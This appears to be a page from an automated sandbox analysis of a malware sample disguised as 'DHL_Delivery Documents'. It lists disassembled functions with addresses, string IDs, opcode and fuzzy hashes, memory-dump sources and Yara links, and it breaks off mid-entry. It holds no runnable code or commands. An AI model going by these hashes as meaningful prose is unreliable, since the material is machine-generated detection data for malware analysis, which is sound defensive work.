                        Similarity
                        • API ID:
                        • String ID: GlobalTags
                        • API String ID: 0-1106856819
                        • Opcode ID: 017820e52795a72b04a4b281360350771cab83018c10048e7cf0ee05bf0c1e4d
                        • Instruction ID: 1a949d08365b22418f6c92c6609dd6ffcb5a8d662047556963b7d161e82b3475
                        • Opcode Fuzzy Hash: 017820e52795a72b04a4b281360350771cab83018c10048e7cf0ee05bf0c1e4d
                        • Instruction Fuzzy Hash: 9A716E75E0022ADFDF28EF9DD5906ADBBB1BF48708F14812EE506A7241E730D941CB90
                        Function 01CB4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: .mui
                        • API String ID: 0-1199573805
                        • Opcode ID: c10c52276b10c7448e9532d2d6a95e9506d30dd0945710d746e6ac140c22dc51
                        • Instruction ID: 35df334ea79c13fd6338a7aca08e4529b383830e386b8cc14d6929b1a01c6488
                        • Opcode Fuzzy Hash: c10c52276b10c7448e9532d2d6a95e9506d30dd0945710d746e6ac140c22dc51
                        • Instruction Fuzzy Hash: 8C51C372D4422ADBDF18DF99C884AEEBBB8AF05610F054129EA12FB211D374CD01CBE4
                        Function 01C2E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: EXT-
                        • API String ID: 0-1948896318
                        • Opcode ID: 9c4ad2e8c36503bf4d2d481e13df3868190dd742c2314cc32bbf9cfb60954abb
                        • Instruction ID: f74c33a8a02155aebac6c45cb33d6f8101d74ca6dcfa66a5d71d383408267fdb
                        • Opcode Fuzzy Hash: 9c4ad2e8c36503bf4d2d481e13df3868190dd742c2314cc32bbf9cfb60954abb
                        • Instruction Fuzzy Hash: 96419272508362DBD721DA79C844B6BBBE8AF88B14F44092DFA84E7180E774DA04D797
                        Function 01C8C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: BinaryHash
                        • API String ID: 0-2202222882
                        • Opcode ID: 90a45f674ec72ea5639fe3c23dedcddf1f26ab8459b45044a59a1d3aa09c035a
                        • Instruction ID: 676d5d4ca919f930960ea4064542bf7eaa7dfc1bf2bfec7c3ef46dab781fe4fc
                        • Opcode Fuzzy Hash: 90a45f674ec72ea5639fe3c23dedcddf1f26ab8459b45044a59a1d3aa09c035a
                        • Instruction Fuzzy Hash: 064144B1D5012DEBDB21EB60CC84FDEB77CAB45718F0045E5AA08A7140DB70DE899FA8
                        Function 01CA6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: #
                        • API String ID: 0-1885708031
                        • Opcode ID: 32ffe6102f45d99c23663caaeb0f76f811789c37ef92b8bbc5102751f71294d2
                        • Instruction ID: f5baa9760eb514b0a01424057471f102fa0636e3e2252362b616a7e1cecc2824
                        • Opcode Fuzzy Hash: 32ffe6102f45d99c23663caaeb0f76f811789c37ef92b8bbc5102751f71294d2
                        • Instruction Fuzzy Hash: 76313D31A0072ADBDB23DF69C854BEEBBB8DF4470CF984028E9509B282D775D945CB50
                        Function 0040A88F Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_400000_DHL_Delivery Documents.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: [
                        • API String ID: 0-784033777
                        • Opcode ID: 5266dcf97484dc5bffdd0d9036717583d3dcca8eb530e0b841ac770ac4b9c2bc
                        • Instruction ID: fdde4ef8f4c62e72e8761bd11f39b832acf8e0d034d05d56d8c11d9b31ff1d10
                        • Opcode Fuzzy Hash: 5266dcf97484dc5bffdd0d9036717583d3dcca8eb530e0b841ac770ac4b9c2bc
                        • Instruction Fuzzy Hash: 2621DC36405B80CBD706AF388A4A085FFA0F94234439896EAC4C12B0A7C6378467CBCB
                        Function 01C9892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                        Download Yara Rule
                        Strings
                        • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 01C9895E
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                        • API String ID: 0-702105204
                        • Opcode ID: b28d2a846a4ab73b7a7547bffeaf29a62d88f81b487334a7b2f23009b1b33bc5
                        • Instruction ID: 3efa5984885d97c3ccb92b5ec1cd175872f2ed5fa43d9bca41eeed90a67221cc
                        • Opcode Fuzzy Hash: b28d2a846a4ab73b7a7547bffeaf29a62d88f81b487334a7b2f23009b1b33bc5
                        • Instruction Fuzzy Hash: 9A012B32300249EFEF26AB6ADCCCB5A7B65EF87254B05001CFA4107552CB60EC55DB92
                        Function 01CB2000 Relevance: .8, Instructions: 757COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 51756c5cee789e34d8e49caa5280f62d92daeae6025d77ac355cd8f9259ff07c
                        • Instruction ID: 3cc43b5dc94ff0d7b0ae16c5b77b1dccdb55abf42998ea8c7db9b3b4cec05c6d
                        • Opcode Fuzzy Hash: 51756c5cee789e34d8e49caa5280f62d92daeae6025d77ac355cd8f9259ff07c
                        • Instruction Fuzzy Hash: 8B42D132608341DBDB25CF69C8D0AABBBE5BF88340F08092DFA86D7250D735E945CB52
                        Function 01CA8158 Relevance: .6, Instructions: 617COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 015d56353d1a447d016f15b6b310bf7974a3c854295062420b5b049c2ed1a3f6
                        • Instruction ID: 9f864faa8d4a191ab10f04aa8aadb0490fc93427edf9aa7f0556dd515230fbe4
                        • Opcode Fuzzy Hash: 015d56353d1a447d016f15b6b310bf7974a3c854295062420b5b049c2ed1a3f6
                        • Instruction Fuzzy Hash: D1425B75A0021ACFEB25CF69C881BADBBF5BF88305F548199E989EB241D734D981CF50
                        Function 01C22840 Relevance: .6, Instructions: 605COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 302abe50e87df711f59c7bffa2271f768793ce2c22b38b97533311dfd47d89fe
                        • Instruction ID: 07363bc67ebbdb78ff5c0c4815536dee7a12cfd7a5654a8af094c43ef59501b5
                        • Opcode Fuzzy Hash: 302abe50e87df711f59c7bffa2271f768793ce2c22b38b97533311dfd47d89fe
                        • Instruction Fuzzy Hash: F732EB70A00B65CBEB25CF6AC8447BEBBF2BF84704F24411DD58A9B285D7B5E902DB50
                        Function 01CBA118 Relevance: .6, Instructions: 591COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bef73cfa36b93acec3189a1a5908cb0f64c36af5411d0528696e0a37ae3d0a67
                        • Instruction ID: 8280bce42eef184e4beaaf889517b2936d2b61f76e385de2424ebbacec1e0914
                        • Opcode Fuzzy Hash: bef73cfa36b93acec3189a1a5908cb0f64c36af5411d0528696e0a37ae3d0a67
                        • Instruction Fuzzy Hash: 7F22AD70204661CBEB25CF2EC0D47B6BBF1AF44300F08845AE9D6CB286E775E652DB61
                        Function 01C16A50 Relevance: .5, Instructions: 548COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bbb3520c971d4cabe13e50c1d748094e85b3c9b5cb2011d3a74507961664e6da
                        • Instruction ID: 51059851d2f13e396910655ae46ead3541bec4110e3a9957313b645913acd408
                        • Opcode Fuzzy Hash: bbb3520c971d4cabe13e50c1d748094e85b3c9b5cb2011d3a74507961664e6da
                        • Instruction Fuzzy Hash: 2232FE70A00215CFDB25CFA9C480BAEBBF1FF49300F248569E956AB795D7B0E941DB90
                        Function 01CA892B Relevance: .4, Instructions: 386COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 765881b337b1f97ee096bc545c5aceb18116ec72db9e5559552e75b5e2d9a9d2
                        • Instruction ID: a0ed25651749a430945d9b71aa382d18499f05356aa88e1d2ec9b14182e11d35
                        • Opcode Fuzzy Hash: 765881b337b1f97ee096bc545c5aceb18116ec72db9e5559552e75b5e2d9a9d2
                        • Instruction Fuzzy Hash: 4CD1E271E0060BCBDB16CF69C841AFEB7F1AF88309F988169D955A7241E735EA058B60
                        Function 01C165D0 Relevance: .4, Instructions: 383COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5a01d985561ea88aaba9fb95c6ba91615a206c25e078bc05c9a4316f83fb935e
                        • Instruction ID: f656525d1552b079c4f7147c0276e35bc49876ec5117ecfb74bc1dd2fac4c436
                        • Opcode Fuzzy Hash: 5a01d985561ea88aaba9fb95c6ba91615a206c25e078bc05c9a4316f83fb935e
                        • Instruction Fuzzy Hash: 36E1D171608352CFC715CF28C080A6ABBF1FF8A314F05896DE9958B355EB71EA05DB92
                        Function 01C08397 Relevance: .4, Instructions: 380COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bd35004c4c9b805572402a52edd5d12832816fb577f88eaf1ca2e5038ae92ba3
                        • Instruction ID: d8f7d6a5eae34dd02422e6e54640addb6d2b045bedf1dcf1d1facde886a2dd3f
                        • Opcode Fuzzy Hash: bd35004c4c9b805572402a52edd5d12832816fb577f88eaf1ca2e5038ae92ba3
                        • Instruction Fuzzy Hash: D6D1E071B00606DBDB1ADF69C890BBA77A5BF54204F05822DEA16DB2C0EB30EE55CB50
                        Function 01C98243 Relevance: .3, Instructions: 322COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                        • Instruction ID: 5d2cc8b90a30e5305abb6d7c085b91b9cd25ceb9dd8829c269c7618171bcaa4b
                        • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                        • Instruction Fuzzy Hash: 96B16374A00609DFDF24DF99C948EABBBB5FF86304F10446DAA42D7790DA34EA45DB10
                        Function 01C20535 Relevance: .3, Instructions: 300COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                        • Instruction ID: d02772a0eaebd76f94d2ea801caeaa64977927d70f3422b552448ad768d1b5c1
                        • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                        • Instruction Fuzzy Hash: 19B12A31600656EFDB26DB68C850BBEBBF6AF44700F14056AE552D7381DB70EE41DB90
                        Function 01C183C0 Relevance: .3, Instructions: 281COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ee30b5ea140514529fafc1a10ecef691a7e1caf1e5d17c475036d535e8485f1f
                        • Instruction ID: ec7bbe76f84f5718cf2ae6f236aae33fe8845bb094f569163ffcd4da1b66f300
                        • Opcode Fuzzy Hash: ee30b5ea140514529fafc1a10ecef691a7e1caf1e5d17c475036d535e8485f1f
                        • Instruction Fuzzy Hash: 76C15774108341CFE764CF19C494BAABBE5FF98704F44496DE98987291D7B4EA08CF92
                        Function 01C0C427 Relevance: .3, Instructions: 280COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b240d962d68ad0b7dcf2b241ad05288d0be54f4ed3ac74c0fcfc2818a78d81e9
                        • Instruction ID: 5b56e22b721348c2b52357ddbe6f69ef48f7cbe26cf662d0d2c7499998bfd955
                        • Opcode Fuzzy Hash: b240d962d68ad0b7dcf2b241ad05288d0be54f4ed3ac74c0fcfc2818a78d81e9
                        • Instruction Fuzzy Hash: 6FB17074A00266CBDB75CF59C880BA9B3B5EF44700F0486E9D50AE7291EB31DEC6DB24
                        Function 01C3E5E7 Relevance: .3, Instructions: 278COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 302d3b67cb451954090e9851d49bd885d3723f1c63ac04cabdb00664c05c58fc
                        • Instruction ID: f4c573e172597928e59080e5ced24e38414e548072a015fa45823c1ec3528e70
                        • Opcode Fuzzy Hash: 302d3b67cb451954090e9851d49bd885d3723f1c63ac04cabdb00664c05c58fc
                        • Instruction Fuzzy Hash: DFA13971E00619DFEB32DB58C888BAE7BB4BF45754F040115EA21AB291D7B4DE80CBD1
                        Function 01C50185 Relevance: .3, Instructions: 276COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3ba8a9a4039dec457ae1604563dfee848431c286dff47374c9433b29fd9431b5
                        • Instruction ID: 5d359735b239eb441ac8a2753c73829bdc1ac646faa55b679ebf0a7400aa6dae
                        • Opcode Fuzzy Hash: 3ba8a9a4039dec457ae1604563dfee848431c286dff47374c9433b29fd9431b5
                        • Instruction Fuzzy Hash: 79A1E070B00616DBDB65DF69C990BBABBB1FF44318F044029EE05D7282DB34E9A1DB94
                        Function 01CE4500 Relevance: .3, Instructions: 275COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1882e8e6537d3d40b281694973c259d7a05b5fb1eea28b93476339e7fcd240f4
                        • Instruction ID: f82666ed7bff88cf17fb4c6b8b0ac43ba1c65ab31d7c941dd92fc4accb54247d
                        • Opcode Fuzzy Hash: 1882e8e6537d3d40b281694973c259d7a05b5fb1eea28b93476339e7fcd240f4
                        • Instruction Fuzzy Hash: EBA1FD72A00212EFC72ADF18C984B6ABBE9FF48704F450528F589DB650C338EE10CB91
                        Function 01CE2B57 Relevance: .3, Instructions: 266COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                        • Instruction ID: 5548cd05e7caa2a1218c768d1b6dd864edbbcd92edfc3cd59a93441b4658dda0
                        • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                        • Instruction Fuzzy Hash: 49B11471E0061ADFDF29CFA9C884BADBBF9BF48310F148129E915A7250D730EA51CB91
                        Function 01C960E0 Relevance: .3, Instructions: 264COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e6dbf24b7b1c986bbf5e8353674cfedc49a85d6107febd3e0db14f3a97df3cc6
                        • Instruction ID: 4f88655a1dc4f6590ffe3af8969e8cf3f8e3342e9ad11347e6455c7a2ad3e2bc
                        • Opcode Fuzzy Hash: e6dbf24b7b1c986bbf5e8353674cfedc49a85d6107febd3e0db14f3a97df3cc6
                        • Instruction Fuzzy Hash: 44919271D00226EFDF15CFA9D888BAEBFB5AF48710F154169E611EB381D734DA409BA0
                        Function 01C2E3F0 Relevance: .3, Instructions: 261COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 87a6aa9b8eecab68ccca768926dcb2610ee4598d5d853de1362bbed1fc1ff709
                        • Instruction ID: 4adc701f8f714cd35abc3b78e4fa85506c46b67c73d0180065b54585654b8276
                        • Opcode Fuzzy Hash: 87a6aa9b8eecab68ccca768926dcb2610ee4598d5d853de1362bbed1fc1ff709
                        • Instruction Fuzzy Hash: 5A911631A00636DBEB25DB6DC844BBDBBB1EF94724F058069E905AB380EB74DE41C751
                        Function 01C66ACC Relevance: .2, Instructions: 226COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a234bfd2ce0194e67eaf0649068fc9e2bf33ebe0974701f0df68700260a3eaa3
                        • Instruction ID: d6cc9a9e13f48a424ed16e5146f776228a1fbe99502f116c212123dbc5d24a2a
                        • Opcode Fuzzy Hash: a234bfd2ce0194e67eaf0649068fc9e2bf33ebe0974701f0df68700260a3eaa3
                        • Instruction Fuzzy Hash: C7819471A00626EBDB18CF69C980ABEBBF9FB48700F14852EE545D7640E334D941CB94
                        Function 01CDAB40 Relevance: .2, Instructions: 222COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                        • Instruction ID: 69c8d37004fe947cf05d45dc02f79ba94e549c83cef3ae6135f5f4c77004c58a
                        • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                        • Instruction Fuzzy Hash: 4E816071A00209DFDF19CF99C890AAEBBF6FF84310F188569DA169B385D774EA01CB54
                        Function 01C4E284 Relevance: .2, Instructions: 212COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d2b372948a12294d2680acda30b8a79c03e0223f979ba0d6edace17d5cae9b21
                        • Instruction ID: ea334e002812614a88b28b8eb676e051dc4344ee3f7f14bc796361879284d33b
                        • Opcode Fuzzy Hash: d2b372948a12294d2680acda30b8a79c03e0223f979ba0d6edace17d5cae9b21
                        • Instruction Fuzzy Hash: 0C818B71A04609EFDB26DFA9C880AEEBBFAFF88314F114429E555A7210D730ED45DB60
                        Function 01C2C640 Relevance: .2, Instructions: 206COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: af82a6581761f5359124c94b506775a9ca960471a1da8fdb360e36635b20b7d0
                        • Instruction ID: a94c1f6bab0c50b079abeee0069d02205c5e28b683fb36611f01c2c76e8b6508
                        • Opcode Fuzzy Hash: af82a6581761f5359124c94b506775a9ca960471a1da8fdb360e36635b20b7d0
                        • Instruction Fuzzy Hash: BC71CD75D0062ADBCB26CF59D8907BEBBB5FF58B10F14411AEA42AB350E374D910CBA4
                        Function 01CC47A0 Relevance: .2, Instructions: 202COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4f098d2ce511bd18231fdbd995b15e609e0f578f9ab03fa0dc45391f43ca42c9
                        • Instruction ID: 237c6175675d24c81a091da6cfd394c72aacb1baca35d4ebf413ae774a02d734
                        • Opcode Fuzzy Hash: 4f098d2ce511bd18231fdbd995b15e609e0f578f9ab03fa0dc45391f43ca42c9
                        • Instruction Fuzzy Hash: 80718D70900205EFDB29CF9DD955A9ABBF8EF90B10B10815EE604A7398C731CE90DB68
                        Function 01C2260B Relevance: .2, Instructions: 201COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0fdc7dddf5d41f75a5f3eedcd127ba5d11adebb2fdd27c92bca00cbe0105f004
                        • Instruction ID: 2a0021282fc7c2b93f5f3be16538d37080fcfaad9b4d0c85bcda1930b7666590
                        • Opcode Fuzzy Hash: 0fdc7dddf5d41f75a5f3eedcd127ba5d11adebb2fdd27c92bca00cbe0105f004
                        • Instruction Fuzzy Hash: 9171B036604662CFD322DF2CC480B6AB7E5FF88710F0485AAE895CB356DB74D946CB91
                        Function 01C9035C Relevance: .2, Instructions: 198COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                        • Instruction ID: 7cc2cbe691781fd15fe7087a24408ae6e61384e48d669ac7bc3c3a7827975017
                        • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                        • Instruction Fuzzy Hash: 20716C71A0061AEFDB10DFA9C988AEEBBB8FF48710F144569E505E7250DB34EA41DB90
                        Function 01CA62A0 Relevance: .2, Instructions: 198COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8aa27ca2c628b05ee1972804b33cb27f052122ae296eb9df1381a56dea76b774
                        • Instruction ID: ddba76e50452da5c4c52bb83c2377ccfcf7589776e4329c42d20865264caacae
                        • Opcode Fuzzy Hash: 8aa27ca2c628b05ee1972804b33cb27f052122ae296eb9df1381a56dea76b774
                        • Instruction Fuzzy Hash: FB710232200B22EFE733CF18C844F66BBE6EF44728F584518E616872A0D775E945DB50
                        Function 01C18AA0 Relevance: .2, Instructions: 197COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
